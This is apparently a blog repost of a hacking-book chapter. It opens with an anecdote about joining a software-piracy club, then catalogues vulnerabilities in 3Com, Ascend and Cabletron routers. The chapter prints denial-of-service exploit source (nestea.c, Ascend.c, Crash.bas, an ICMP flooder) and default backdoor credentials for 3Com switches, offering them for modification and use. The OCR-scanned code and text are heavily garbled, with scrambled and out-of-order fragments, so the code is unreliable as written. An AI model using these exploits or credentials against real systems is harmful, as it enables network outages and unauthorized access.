Sunday, December 6, 2009

Vulnerability Hacking Secrets

ACT III

A Hacker's Vocation



As I stood there pondering my new found potential source of goodies, I realized I was a bit confused: The letter stated that there were a few prerequisites before I would be considered a tyro member. First and foremost, I had to draft a few paragraphs as an autobiography, including my expectations of, and prospective personal offerings to, the group. Second, I had to include a list of software, hardware, and technologies in which I considered myself skilled. The third requirement mandated a complete listing of all software and hardware in my current possession. Last, I was required to make copies of this information and mail them to the names on a list that was included on an enclosed diskette. I was especially excited to see that list. I wondered: Was it a member list? How many computer enthusiasts, like myself, could there be? I immediately popped the disk in my system and executed the file, runme.com. Upon execution, the program produced an acceptance statement, which I skimmed, and quickly clicked on Agreed. Next I was instructed to configure my printer for mailing labels. This I was happy to do since I had just purchased a batch of labels and couldn't wait to print some out. To my surprise, however, my printer kept printing and printing until I had to literally run to the store and buy some more, and then again—five packets of 50 in all. Then I had to buy 265 stamps. I couldn't believe the group had more than 260 members: How long ago had this group been established? I was eager to find out, so I mailed my requirements the very next morning. The day after, as I walked back from the post office, I thought I should make a copy of my membership disk; it did have important contacts within. But when I arrived home and loaded the diskette, the runme.com file seemed to have been deleted. (Later I discovered a few hidden files that solved that mystery.) The list was gone, so I waited.



Patience is a virtue—at least that's what I was brought up to believe. And, in this case it paid off. It wasn't long before I received my first reply as a new member of this computer club. The new package included another mailing list—different from the first one and much smaller. There was also a welcome letter and a huge list of software programs. The latter half of the welcome note included some final obligatory instructions. My first directive was to choose a handle, a nickname by which I would be referred in all correspondence with the club. I chose Ponyboy, my nickname in a neighborhood group I had belonged to some years back. The next objective was twofold: First I had to send five of the programs from my submission listing to an enclosed address. In return, as the second part of the objective, I was to choose five programs I wanted from the list enclosed with the welcome letter. I didn't have a problem sending my software (complete original disks, manuals, and packaging) as I was looking forward to receiving new replacements.



Approximately a week and a half passed before I received a response. I was surprised that it was much smaller than the one I had mailed—there was no way my selections could fit in a parcel that small. My initial suspicion was that I had been swindled, but when I opened the package, I immediately noticed three single-sided diskettes with labels and cryptic handwriting on both sides. It took a moment for me to decipher the scribble to recognize the names of computer programs that I had requested, plus what appeared to be extra software, on the second side of the third diskette. Those bonus programs read simply: hack-005. This diskette aroused my curiosity as never before. I cannot recall powering on my system and scanning a diskette so quickly before or since.



The software contained Underground disk copy programs, batches of hacking text files, and file editors from ASCII to HEX. One file included instructions on pirating commercial software, another on how to convert single-sided diskettes into using both sides (that explained the labels on both sides

427

of what would normally have been single-sided floppies). And there was more: files on hacking system passwords and bypassing CMOS and BIOS instructions. There was a very long list of phone numbers and access codes to hacker bulletin boards in almost every state. There was also information on secret meetings that were to take place in my area. I felt like a kid given free rein in a candy store. In retrospect, I believe that was the moment when I embarked on a new vocation: as a hacker.



Gateways and Routers and Internet Server Daemons



The port, socket, and service vulnerability penetrations detailed in Chapter 8 can more or less be applied to any section in this part of the book, as they were chosen because they are among the most common threats to a specific target. Using examples throughout the three chapters that comprise this part, we'll also examine specifically selected exploits, those you may already be aware of and many you probably won't have seen until now. Together, they provide important information that will help to solidify your technology foundation. And all the source code, consisting of MS Visual Basic, C, and Perl snippets, can be modified for individual assessments.



In this chapter, we cover gateways and routers and Internet server daemons. In Chapter 10, we cover operating systems, and in Chapter 11, proxies and firewalls.



Without written consent from the target company, most of these procedures are illegal in the United States and many other countries. Neither the author nor the publisher will be held accountable for the use or misuse of the information contained in this book.



Gateways and Routers



Fundamentally, a gateway is a network point that acts as a doorway between multiple networks. In a company network, for example, a proxy server may act as a gateway between the internal network and the Internet. By the same token, an SMTP gateway would allow users on the network to exchange e-messages. Gateways interconnect networks and are categorized according to their OSI model layer of operation; for example, repeaters at Physical Layer 1, bridges at Data Link Layer 2, routers at Network Layer 3, and so on. This section describes vulnerability hacking secrets for common gateways that function primarily as access routers, operating at Network Layer 4.



A router that connects any number of LANs or WANs uses information from protocol headers to build a routing table, and forwards packets based on compiled decisions. Routing hardware design is relatively straightforward, consisting of network interfaces, administration or console ports, and even auxiliary ports for out-of-band management devices such as modems. As packets travel into a router's network interface card, they are placed into a queue for processing. During this operation, the router builds, updates, and maintains routing tables while concurrently checking packet headers for next-step compilations—whether accepting and forwarding the packet based on routing policies or discarding the packet based on filtering policies. Again, at the same time, protocol performance functions provide handshaking, windowing, buffering, source quenching, and error checking.



The gateways described here also involve various terminal server, transport, and application gateway services. These Underground vulnerability secrets cover approximately 90 percent of the gateways in use today, including those of 3Com, Ascend, Cabletron, Cisco, Intel, and Nortel/Bay.



3Com



3Com (www.3com.com) has been offering technology products for over two decades. With more than 300 million users worldwide, it's no wonder 3Com is among the 100 largest companies on the Nasdaq. Relevant to this section, the company offers access products that range from small-office,

connectivity with the OfficeConnect family of products, to high-performance LAN/WAN availability, including VPN tunneling and security applications. Each solution is designed to build medium-enterprise secure remote access, intranets, and extranets. These products integrate WAN technologies such as Frame Relay, xDSL, ISDN, leased lines, and multiprotocol LAN-to-LAN connections. The OfficeConnect product line targets small to medium-sized businesses, typically providing remote-location connectivity as well as Internet access. On the other end of the spectrum, the SuperStack II and Total Control product series provide medium to large enterprises and ISPs with secure, reliable connections to branch offices, the Internet, and access points for mobile users.



Liabilities

HiPer ARC Card Denial-of-Service Attack

Synopsis: 3Com HiPer ARC vulnerable to nestea and 1234 denial-of-service (DoS) attacks. Hack State: System crash.

Vulnerabilities: HiPer ARC's running system version 4.1.11/x.

Breach: 3Com's HiPer ARC's running system version 4.1.11 are vulnerable to certain DoS attacks that cause the cards to simply crash and reboot. Hackers note: 3Com/USR's IP stacks are historically not very resistant to specific kinds of DoS attacks, such as Nestea.c variations (originally by humble of rhino9), shown here:



Nestea.c

#include #include #include #include #include #include #include #include #include #include #include























/* bsd usage works now, the original nestea.c was broken, because s

ome

braindead linsux-c0d3r was too stupid to use sendto() correctly

*/

#ifndef STRANGE_LINSUX_BYTE_ORDERING_THING

OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3

.0 */

#define FIX(n) (n)

#else /* OpenBSD 2.1, all Linux */

#define FIX(n) htons(n)

#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF #define IPH #define UDPH

0x2000 /* More IP fragment en route */ 0x14 /* IP header size */

0x8

size

/

/* UDP header 430

#define MAGIC2 108

#define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes w

e

shouldnt have access to in the kernel. to be safe, we should hit them till they die :





void usage(u_char *);

u_long name_resolve(u_char *);

u_short in_cksum(u_short *, int);

void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv)

{

int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr;





if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)

{

perror("raw socket"); exit(1);

}

if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))

< 0)

perror("IP_HDRINCL");

exit(1);

}

if (argc < 3) usage(argv[0]);

if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolv

e(argv[2])))

{

fprintf(stderr, "What the hell kind of IP address is that?\

n");

exit(1);





while ((i = getopt(argc, argv, "s:t:n:")) != EOF)

{

switch (i) {

case 's': /* source port (should be emphe

meral) */

src_prt = (u_short)atoi(optarg);
break;

case 't': /* dest port (DNS, anyone?) */

dst_prt = (u_short)atoi(optarg);
break;

case 'n': /* number to send */
count = atoi(optarg); break; default :

usage(argv[0]);

break; /* NOTREACHED */

}

}

srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % Oxffff); if (!dst_prt) dst_prt = (random() % Oxffff); if (!count) count = COUNT;



fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");

fprintf(stderr, "Death on flaxen wings (yet again):\n"); addr.s_addr = src_ip;

fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip;

fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ ");

for (i = 0; i < count; {

send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);

fprintf(stderr, "bOOm ");

usleep(500);

}

fprintf(stderr, "]\n"); return (0);

}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src _prt,

u_short dst_prt)

{

int i;

u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */

struct sockaddr_in sin; /* socket protocol stru

cture */



sin.sin_family = AF_INET;

sin.sin_port = src_prt;

sin.sin addr.s addr = dst ip;



packet = (u_char *)malloc(IPH + UDPH + PADDING+40); p_ptr = packet;

bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

byte = 0x45; /* IP version and header leng

th */

memcpy(p_ptr, &byte, sizeof(u_char));

p_ptr += 2; /* IP TOS (skipped) */

*((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length

*/

p_ptr += 2;

*((u_short *)p_ptr) = htons(242); /* IP id */

p_ptr += 2;

*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset

*/

p_ptr += 2;

*((u_short *)p_ptr) = 0x40; /* IP TTL */

byte = IPPROTO_UDP;

memcpy(p_ptr + 1, &byte, sizeof(u_char));

p_ptr += 4; /* IP checksum filled in by

kernel */

*((u_long *)p_ptr) = src_ip; /* IP source address */

p_ptr += 4;

*((u_long *)p_ptr) = dst_ip; /* IP destination address *

/

p_ptr += 4;

*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */

p_ptr += 2;

*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination po

rt */

p_ptr += 2;

*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length *

/



if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr * )&sin,

sizeof(struct sockaddr)) == -1)

{

perror("\nsendto"); free(packet); exit(1);

}



p_ptr = packet;

bzero((u_char *)p_ptr, IPH + UDPH + PADDING);



byte = 0x45; /* IP version and header leng

th */

memcpy(p_ptr, &byte, sizeof(u_char));

p_ptr += 2; /* IP TOS (skipped) */

*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total lengt



p_ptr += 2;

*((u_short *)p_ptr) = htons(242); /* IP id */

p_ptr += 2;

*((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset *

p_ptr += 2;

*((u_short *)p_ptr) = 0x40; /* IP TTL */

byte = IPPROTO_UDP;

memcpy(p_ptr + 1, &byte, sizeof(u_char));

p_ptr += 4; /* IP checksum filled in by kern

el */

*((u_long *)p_ptr) = src_ip; /* IP source address */

p_ptr += 4;

*((u_long *)p_ptr) = dst_ip; /* IP destination address */

p_ptr += 4;

*((u_short *)p_ptr) = htons(src_prt); /* UDP source port

*/

/* UDP destination po

p_ptr += 2;

*((u_short *)p_ptr) = htons(dst_prt);

rt */

p_ptr += 2;



*((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length *

/



if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockad

dr

*)&sin,

sizeof(struct sockaddr)) == -1)

{

perror("\nsendto");

free(packet);

exit(1);

}

p_ptr = packet;

bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);

byte = 0x4F; /* IP version and header leng

th */

memcpy(p_ptr, &byte, sizeof(u_char));

p_ptr += 2; /* IP TOS (skipped) */

*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total le ngth */

p_ptr += 2;

*((u_short *)p_ptr) = htons(242); /* IP id */

p_ptr += 2;

*((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offs et */

p_ptr += 2;

*((u_short *)p_ptr) = 0x40; /* IP TTL */

byte = IPPROTO_UDP;

memcpy(p_ptr + 1, &byte, sizeof(u_char));

p_ptr += 4; /* IP checksum filled in by kern

el */

= dst_ip; /* IP

= htons(src_prt); = htons(dst_prt);

= htons(8 + PADDING);

*((u_long *)p_ptr) p_ptr += 4; *((u_long *)p_ptr)

/

p_ptr += 44; *((u_short *)p_ptr) p_ptr += 2; *((u_short *)p_ptr)

rt */

p_ptr += 2; *((u_short *)p_ptr)

/



for(i=0;i
{

p_ptr[i++]=random()%255;

}



if (sendto(sock, packet, IPH + UDPH + PADDING+40, 0, (struct so

ckaddr *)&sin,

sizeof(struct sockaddr)) == -1)

{

perror("\nsendto");

free(packet);

exit(1);

}

free(packet);

}



u_long name_resolve(u_char *host_name)

{

struct in_addr addr; struct hostent *host_ent;



if ((addr.s_addr = inet_addr(host_name)) == -1)

{

if (!(host_ent = gethostbyname(host_name))) return (0); bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);

~ }

return (addr.s_addr);

}



void usage(u_char *name)

{

fprintf(stderr,

"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",

name);

exit(0);

}



HiPer ARC Card Login

Synopsis: The HiPer ARC card establishes a potential weakness with the default adm account.



Hack State: Unauthorized access.



Vulnerabilities: HiPer ARC card v4.1.x revisions.



Breach: The software that 3Com has developed for the HiPer ARC card (v4.1.x revisions) poses potential security threats. After uploading the software, there will be a login account called adm, with no password. Naturally, security policies dictate to delete the default adm login from the configuration. However, once the unit has been configured, it is necessary to save settings and reset the box. At this point, the adm login (requiring no password), remains active and cannot be deleted.



Filtering



Synopsis: Filtering with dial-in connectivity is not effective. Basically, a user can dial in, receive a ''host" prompt, then type in any hostname without actual authentication procedures. Consequently, the system logs report that the connection was denied.



Hack State: Unauthorized access.



Vulnerabilities: Systems with the Total Control NETServer Card V.34/ISDN with Frame Relay V3.7.24. AIX 3.2.



Breach: Total Control Chassis is common in many terminal servers, so when someone dials in to an ISP, he or she may be dialing in to one of these servers. The breach pertains to systems that respond with a "host:" or similar prompt. When a port is set to "set host prompt," the access filters are commonly ignored:

sho filter allowedhosts



permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.161/32 tcp dst eq 539

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.165/32 tcp dst eq 23

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.106/32 tcp dst eq 23

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.168/32 tcp dst eq 540

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.168/32 tcp dst eq 23

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 3030

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 3031

permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 513

deny 0.0.0.0/0 0.0.0.0/0 ip



An attacker can type a hostname twice at the "host:" prompt, and be presented with a telnet session to the target host. At this point, the hacker gains unauthorized access, such as:

sho ses

S19 hacker.target.system. Login In ESTABLISHED 4:30 Even though access is attained, the syslogs will typically report the following: XXXXXX remote_access: Packet filter does not exist. User hacker... access denied. Master Key Passwords

Synopsis: Certain 3Com switches open a doorway to hackers due to a number of "master key" passwords that have been distributed on the Internet.

Hack State: Unauthorized access to configurations.



Vulnerabilities: The CoreBuilder 2500, 3500, 6000, and 7000, or SuperStack II switch 2200, 2700, 3500, and 9300 are all affected.



Breach: According to 3Com, the master key passwords were ''accidentally found" by an Internet user and then published by hackers of the Underground. Evidently, 3Com engineers keep the passwords for use during emergencies, such as password loss.

CoreBuilder 6000/2500 username: debug password: synnet

CoreBuilder 7000 username: tech password: tech

SuperStack II Switch 2200 username: debug password: synnet

SuperStack II Switch 2700 username: tech password: tech





The CoreBuilder 3500 and SuperStack II Switch 3900 and 9300 also have these mechanisms, but the special login password is changed to match the admin-level password when the password is modified.

NetServer 8/16 DoS Attack

Synopsis: NetServer 8/16 vulnerable to nestea DoS attack. Hack State: System crash.

Vulnerabilities: The NetServer 8/16 V.34, O/S version 2.0.14.

Breach: The NetServer 8/16 is also vulnerable to Nestea.c (shown previously) DoS attack. PalmPilot Pro DoS Attack

Synopsis: PalmPilot vulnerable to nestea DoS attack. Hack State: System crash.

Vulnerabilities: The PalmPilot Pro, O/S version 2.0.x.

Breach: 3Com's PalmPilot Pro running system version 2.0.x is vulnerable to a nestea.c DoS attack, causing the system to crash and require reboot.



The source code in this chapter can be found on the CD bundled with this book.

Ascend/Lucent



The Ascend (www.ascend.com) remote-access products offer open WAN-to-LAN access and security features all packed in single units. These products are considered ideal for organizations that need to maintain a tightly protected LAN for internal data transactions, while permitting outside free access to Web servers, FTP sites, and such. These products commonly target small to medium business gateways and enterprise branch-to-corporate access entry points. Since the merger of

Lucent Technologies (www.lucent.com) with Ascend Communications, the data networking product line is much broader and more powerful and reliable.



Liabilities



Distorted UDP Attack



Synopsis: There is a flaw in the Ascend router internetworking operating system that allows the machines to be crashed by certain distorted UDP packets.

fj C Stan Z

Target AdieK orHostnarw: [21C

Figure 9.1 Successful penetration with the TigerBreach Penetrator. Hack State: System crash.

Vulnerabilities: Ascend Pipeline and MAX products.

Breach: While Ascend configurations can be modified via a graphical interface, this configurator locates Ascend routers on a network using a special UDP packet. Basically, Ascend routers listen for broadcasts (a unique UDP packet to the "discard" port 9) and respond with another UDP packet that contains the name of the router. By sending a specially distorted UDP packet to the discard port of an Ascend router, an attacker can cause the router to crash. With TigerBreach Penetrator, during a security analysis, you can verify connectivity to test for this flaw (see Figure 9.1).



An example of a program that can be modified for UDP packet transmission is shown here (Figure 9.2 shows the corresponding forms).



Crash.bas



Option Explicit



Private Sub Crash()

Socketl.RemoteHost = txtIP.Text Socketl.SendData txtName.Text + "Crash!!!"

End Sub

Synopsis: Challenging remote telnet sessions can congest the Ascend router session limit and cause the system to refuse further attempts.



Hack State: Severe congestion.



Vulnerabilities: Ascend Pipeline products.



Breach: Continuous remote telnet authentication attempts can max out system session limits, causing the router to refuse legitimate sessions.



MAX Attack



Synopsis: Attackers have been able to remotely reboot Ascend MAX units by telnetting to Port 150 while sending nonzero-length TCP Offset packets with TCPoffset.c, shown later.

Hack State: System restart.

Vulnerabilities: Ascend MAX 5x products.

TCP Offset Harassment

Synopsis: A hacker can crash an Ascend terminal server by sending a packet with nonzero-length

TCP offsets.

Hack State: System crash. Vulnerabilities: Ascend terminal servers.

Breach: Ascend.c (originally by The Posse).



Ascend.c



#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

unsigned short compute_tcp_checksum(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr)

{

unsigned long sum; __asm__("

addl %%ecx, %%ebx

adcl %%edx, %%ebx

adcl $0, %%ebx



: "=b"(sum)

: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_

TCP*256)

: "bx", "cx", "dx" );

__asm__("

movl %%ecx, %%edx

cld

cmpl $32, %%ecx jb 2f

%%ebx %%ebx %%ebx %%ebx

shrl $5, %%ecx clc

1: lodsl

adcl %%eax, lodsl

adcl %%eax, lodsl

adcl %%eax, lodsl

adcl %%eax,

lodsl

adcl %%eax, lodsl

adcl %%eax, lodsl

adcl %%eax, lodsl

adcl %%eax,

loop

adcl

movl

andl

je 4f

shrl

clc

lodsl

adcl

loop

adcl

movl

testw

je 5f

lodsw

addl

adcl

movw

test

je 6f

lodsb

addl

adcl

movl

shrl

addw

adcw

1b

$0, %%ebx %%edx, %%e< $28, %%ecx

%%eax,

3b

$0, %% $0, %%

$2, %



$2, %%ecx





%%ebx



ebx eax

%dx





%%eax, %%ebx $0, %%ebx $0, %%ax $1, %%edx





%%eax, %%ebx $0, %%ebx %%ebx, %%eax $16, %%eax

%%ax, %%bx

$0, %%bx

: "=b"(sum)

: "0"(sum), "c"(len), "S"(th)

: "ax", "bx", "cx", "dx", "si

return((~sum) & 0xffff);

}

#define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) ) #define tcp_offset ( sizeof(struct iphdr) ) #define err(x) { fprintf(stderr, x); exit(1); } #define errors(x, y) { fprintf(stderr, x, y); exit(1); } struct iphdr temp_ip; int temp_socket = 0;

u_short



ip_checksum (u_short * buf, int nwords) {

unsigned long sum;

for (sum = 0; nwords > 0; nwords-- )

sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum;

void

fixhost (struct sockaddr_in *addr, char *hostname)

{

struct sockaddr_in *address; struct hostent *host;



address = (struct sockaddr_in *) addr;

(void) bzero ((char *) address, sizeof (struct sockaddr_in)); address->sin_family = AF_INET;

address ->sin_addr.s_addr = inet_addr (hostname); if ((int) address->sin_addr.s_addr == -1) {

host = gethostbyname (hostname);

if (host)

{

bcopy (host->h_addr, (char *) &address->sin_addr, host->h_length);

}

else {

puts ("Couldn't resolve address!!!"); exit (-1);

}

}

}

unsigned int lookup (host)

char *host;

{

unsigned int addr; struct hostent *he;



addr = inet_addr (host); if (addr == -1) {

he = gethostbyname (host);

if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))



return 0;



bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); }

return (addr);

}

unsigned short lookup_port (p) char *p;



int i;

struct servent *s;

if ((i = atoi (p)) == 0) {

if ((s = getservbyname (p, "tcp")) == NULL)

errors ("Unknown port %s\n", p); i = ntohs (s->s_port);

}

return ((unsigned short) i);

}



void

spoof_packet (struct sockaddr_in local, int fromport, \

struct sockaddr_in remote, int toport, ulong sequence, \ int sock, u_char theflag, ulong acknum, \ char *packdata, int datalen)

{

char *packet; int tempint; if (datalen > 0) datalen++;

Подпись: (char *) toport; fromport; = tempint;

malloc (psize + datalen);

packet = tempint toport = fromport

{

tcp_offset);

(packet + = htons (fromport); = htons (toport); = theflag; random (); random ();

however we randomize everything

struct tcphdr *fake_tcp; fake_tcp = (struct tcphdr * fake_tcp->th_dport fake_tcp->th_sport fake_tcp->th_flags fake_tcp ->th_seq = fake_tcp->th_ack = /* this is what really matters, else

to prevent simple rule based filters */ fake_tcp->th_off = random (); fake_tcp->th_win = random (); fake_tcp->th_urp = random ();



}

if (datalen > 0) {

char *tempbuf;

tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcph

dr));

for (tempint = 0; tempint < datalen - 1; tempint++) {

*tempbuf = *packdata;

*tempbuf++;

*packdata++;

}

*tempbuf = '\r';



{

struct iphdr *real_ip; real_ip = (struct iphdr *) packet; real_ip->version = 4; real_ip->ihl = 5;

real_ip->tot_len = htons (psize + datalen);

real_ip->tos = 0;

real_ip->ttl = 64;

real_ip->protocol = 6;

real_ip->check = 0;

real_ip->id = 10786;

real_ip->frag_off = 0;

bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));

bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));

temp_ip.saddr = htonl (ntohl (real_ip->daddr));

real_ip->daddr = htonl (ntohl (real_ip->saddr));

real_ip->saddr = temp_ip.saddr;

real_ip-

>check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1); {

struct tcphdr *another_tcp;

another_tcp = (struct tcphdr *) (packet + tcp_offset);

another_tcp->th_sum = 0;

another_tcp-

>th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen,

real_ip->saddr, real_ip-

>daddr); }

} {

int result;

sock = (int) temp_socket;

result = sendto (sock, packet, psize + datalen, 0,

(struct sockaddr *) &remote, sizeof (remote));

}

free (packet);



}

void

main (argc, argv) int argc; char **argv;

{

unsigned int daddr; unsigned short dport; struct sockaddr_in sin; int s, i;

if (argc != 3)

errors ("Usage: %s \n\nDest port of 23 f

Ascend units.\n", argv[0]);

if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n");

if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -

err ("Unable to open raw socket.\n"); if (!(daddr = lookup (argv[1])))

err ("Unable to lookup destination address.\n"); dport = lookup_port (argv[2]); sin.sin_family = AF_INET; sin.sin_addr.s_addr = daddr; sin.sin_port = dport;

fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1

r

fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[

);

/* 500 seems to be enough to kill it */ for (i = 0; i < 500; i++)

start_seq++;

local.sin_addr.s_addr = random ();

spoof_packet (local, random (), remote, dport, start_seq, (in TH_SYN | TH_RST |



Cabletron/Enterasys



The unique products offered through Cabletron/Enterasys (www.enterasys.com) provide high-speed, high-performance network access from the desktop to the data center. Clearly a virtuous rival to Cisco, this innovative line of products leads with the SmartSwitch router family, found in more and more enterprise backbones and WAN gateways. These products are designed to provide the reliability and scalability demanded by today's enter­prise networks, with four key remunerations: wire-speed routing at gigabit speeds, pinpoint control over application usage, simplified management, and full-featured security.



Liabilities



CPU Jamming

Synopsis: SmartSwitch Router (SSR) product series are vulnerable to CPU flooding. Hack State: Processing interference with flooding. Vulnerabilities: SmartSwitch Router (SSR) series.

Breach: Hackers can flood the SSR CPU with processes simply by sending substantial packets (with TTL=0) through, with a destination IP address of all zeros. As explained earlier in this book, time-to-live (TTL) is defined in an IP header as how many hops a packet can travel before being dropped. A good modifiable coding example providing this technique format, originally inspired by security enthusiast and programmer Jim Huff, is provided in the following code and in Figure 9.3.



Icmpfld.bas



Dim iReturn As Long, sLowByte As String, sHighByte As String Dim sMsg As String, HostLen As Long, Host As String

Dim Hostent As Hostent, PointerToPointer As Long, ListAddress As Lo ng

Dim WSAdata As WSAdata, DotA As Long, DotAddr As String, ListAddr A s Long

Dim MaxUDP As Long, MaxSockets As Long, i As Integer Dim description As String, Status As String



Dim bReturn As Boolean, hIP As Long

Dim szBuffer As String

Dim Addr As Long

Dim RCode As String

Dim RespondingHost As String

Dim TraceRT As Boolean

Dim TTL As Integer

Const WS_VERSION_MAJOR = &H101 \ &H100 And &HFF& Const WS_VERSION_MINOR = &H101 And &HFF& Const MIN_SOCKETS_REQD = 0

Sub vbIcmpCloseHandle()

bReturn = IcmpCloseHandle(hIP)

If bReturn = False Then

MsgBox "ICMP Closed with Error", vbOKOnly, "VB4032-

ICMPEcho" End If



End Sub



Sub GetRCode()

If pIPe.Status = 0 Then

Text3.Text = Text3.Text + " Reply from " + RespondingH

ost +

": Bytes = " + Trim$(CStr(pIPe.DataSize)) + " RTT = " + Trim$(CStr(pIPe.RoundTripTime)) + "ms TTL = " + Trim$(CStr(pIPe.Options.TTL)) + Chr$(13) + Chr$(10) Else

Text3.Text = Text3.Text + " Reply from " + RespondingH

ost +

": " + RCode + Chr$(13) + Chr$(10) End If

Else

If TTL -

1 < 10 Then Text3.Text = Text3.Text + " Hop # 0" + CStr(TTL -

1) Else Text3.Text = Text3.Text + " Hop # " + CStr(TTL - 1)

Text3.Text = Text3.Text + " " + RespondingHost + Chr$(13)

+

Chr$(10) End If End Sub



Function HiByte(ByVal wParam As Integer) HiByte = wParam \ &H100 And &HFF&

End Function



Function LoByte(ByVal wParam As Integer)

LoByte = wParam And &HFF& End Function

Sub vbGetHostByName()

Dim szString As String

Host = Trim$(Text1.Text) ' Set Variable Host to V

alue



in Text1.text

szString = String(64, &H0)

Host = Host + Right$(szString, 64 - Len(Host))
If gethostbyname(Host) = SOCKET_ERROR Then ' If WS

ock32

error, then tell me about it

sMsg = "Winsock Error" & Str$(WSAGetLastError()) 'MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"

Else

PointerToPointer = gethostbyname(Host) ' Get t

he

pointer to the address of the winsock hostent structure CopyMemory Hostent.h_name, ByVal _

PointerToPointer, Len(Hostent) ' Copy

Winsock structure to the VisualBasic structure

ListAddress = Hostent.h_addr_list ' Get t

he

ListAddress of the Address List

CopyMemory ListAddr, ByVal ListAddress, 4 ' Copy

Winsock structure to the VisualBasic structure

CopyMemory IPLong, ByVal ListAddr, 4 ' Get t

he

first list entry from the Address List

CopyMemory Addr, ByVal ListAddr, 4

Label3.Caption = Trim$(CStr(Asc(IPLong.Byte4)) + "." + CStr(Asc(IPLong.Byte3)) _



+ "." +

CStr(Asc(IPLong.Byte2)) + "." + CStr(Asc(IPLong.Byte1))) End If End Sub



Sub vbGetHostName()

Host = String(64, &H0) ' Set Host value to a bunch of

spaces

If gethostname(Host, HostLen) = SOCKET_ERROR Then ' This ro utine

is where we get the host's name

sMsg = "WSock32 Error" & Str$(WSAGetLastError()) ' If WSOC



error, then tell me about it

'MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"

Host = Left$(Trim$(Host), Len(Trim$(Host)) -1) ' Trim up the results

Text1.Text = Host ' Display

the

host's name in label1 End If End Sub



Sub vbIcmpCreateFile()

hIP = IcmpCreateFile() If hIP = 0 Then

MsgBox "Unable to Create File Handle", vbOKOnly, "VBPing32" End If End Sub



Sub vbIcmpSendEcho()

Dim NbrOfPkts As Integer szBuffer =

"abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnop qrstuvw

abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklm" If IsNumeric(Text5.Text) Then

If Val(Text5.Text) < 32 Then Text5.Text = "32"

If Val(Text5.Text) > 128 Then Text5.Text = "128"

Else

Text5.Text = "32" End If

szBuffer = Left$(szBuffer, Val(Text5.Text)) If IsNumeric(Text4.Text) Then

If Val(Text4.Text) < 1 Then Text4.Text = "1"

Else

Text4.Text = "1" End If

If TraceRT = True Then Text4.Text = "1" For NbrOfPkts = 1 To Trim$(Text4.Text)

DoEvents

bReturn = IcmpSendEcho(hIP, Addr, szBuffer, Len(szBuffer),

pIPo,

pIPe, Len(pIPe) + 8, 2700)



If bReturn Then

RespondingHost = CStr(pIPe.Address(0)) + "." + CStr(pIPe.Address(1)) + "." + CStr(pIPe.Address(2)) + "." + CStr(pIPe.Address(3))

GetRCode

Else ' I hate it when this happens. If I get an ICM

P

timeout

' during a TRACERT, try again. If TraceRT Then TTL = TTL - 1

